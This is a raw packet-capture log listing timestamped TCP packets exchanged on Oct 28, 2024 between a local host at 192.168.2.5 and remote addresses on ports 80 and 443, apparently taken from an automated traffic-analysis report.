                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.289730072 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.289755106 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.289757013 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.289789915 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.289832115 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.290237904 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.290354967 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.290354967 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.290390968 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.290410995 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.290420055 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.290455103 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.290462017 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.290488005 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.290497065 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.290519953 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.290554047 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.290581942 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.290584087 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.290616035 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.290627956 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.290688992 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.291246891 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.291281939 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.291296959 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.291332960 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.291371107 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.291376114 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.291404963 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.291419983 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.291439056 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.291445017 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.291471958 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.291505098 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.291528940 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.291567087 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.291848898 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.291956902 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.291999102 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.292026043 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.292032003 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.292037010 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.292066097 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.292093039 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.292100906 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.292117119 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.292135000 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.292148113 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.292170048 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.292186975 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.292227030 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.328876019 CET4434990813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.332968950 CET49908443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.332993984 CET4434990813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.334117889 CET49908443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.334125042 CET4434990813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.337470055 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.337527037 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.337547064 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.337562084 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.337608099 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.337752104 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.337791920 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.337831974 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.337887049 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.337923050 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.337928057 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.338092089 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.338624001 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.338680029 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.381150007 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.381227970 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.381319046 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.381361961 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.408174038 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.408209085 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.408238888 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.408243895 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.408293009 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.408492088 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.408525944 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.408548117 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.408574104 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.408586979 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.408608913 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.408616066 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.408826113 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.408850908 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.408885002 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.408919096 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.408934116 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.408967018 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.410898924 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.410969973 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.410990000 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.411047935 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.411201954 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.411237001 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.411289930 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.411381006 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.411412954 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.411446095 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.411467075 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.411479950 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.411493063 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.411523104 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.411778927 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.411828995 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.411861897 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.411873102 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.411892891 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.411896944 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.411904097 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.411930084 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.411962986 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.412000895 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.412012100 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.412158966 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.413125992 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.413161039 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.413196087 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.413229942 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.413253069 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.413263083 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.413290977 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.413296938 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.413310051 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.413326025 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.413352966 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.413357973 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.413386106 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.413392067 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.413399935 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.413433075 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.414230108 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.414263964 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.414280891 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.414298058 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.414333105 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.414341927 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.414367914 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.414382935 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.414401054 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.414408922 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.414434910 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.414469004 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.414477110 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.414515018 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.415407896 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.415442944 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.415462971 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.415476084 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.415509939 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.415513992 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.415541887 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.415553093 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.415575981 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.415594101 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.415608883 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.415621996 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.415642023 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.415828943 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.416002989 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.416050911 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.416054010 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.416086912 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.416121006 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.416135073 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.416155100 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.416178942 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.416194916 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.416203976 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.416229010 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.416261911 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.416321039 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.416773081 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.416807890 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.416825056 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.416841030 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.416857004 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.416873932 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.416882038 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.416908979 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.416927099 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.416943073 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.416976929 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.416987896 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.417010069 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.417026043 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.417064905 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.417284966 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.417319059 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.417335033 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.417352915 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.417387009 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.417396069 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.417418957 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.417431116 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.417453051 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.417457104 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.417486906 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.417520046 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.417530060 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.417553902 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.417566061 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.417587042 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.417602062 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.417632103 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.418013096 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.418049097 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.418061972 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.418102980 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.460702896 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.460812092 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.460844040 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.460896015 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.460937023 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.460958004 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.460990906 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.461044073 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.461060047 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.461087942 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.461122036 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.461134911 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.461168051 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.464421988 CET4434990813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.464548111 CET4434990813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.468204021 CET49908443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.471261024 CET49908443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.471276045 CET4434990813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.471348047 CET49908443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.471355915 CET4434990813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.474926949 CET49912443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.475009918 CET4434991213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.475203037 CET49912443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.476042986 CET49912443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.476075888 CET4434991213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.531306028 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.531328917 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.531344891 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.531399012 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.531511068 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.531527042 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.531543016 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.531553984 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.531558037 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.531574011 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.531584024 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.531610966 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.532012939 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.532027960 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.532043934 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.532094002 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.534302950 CET804987577.83.175.105192.168.2.5
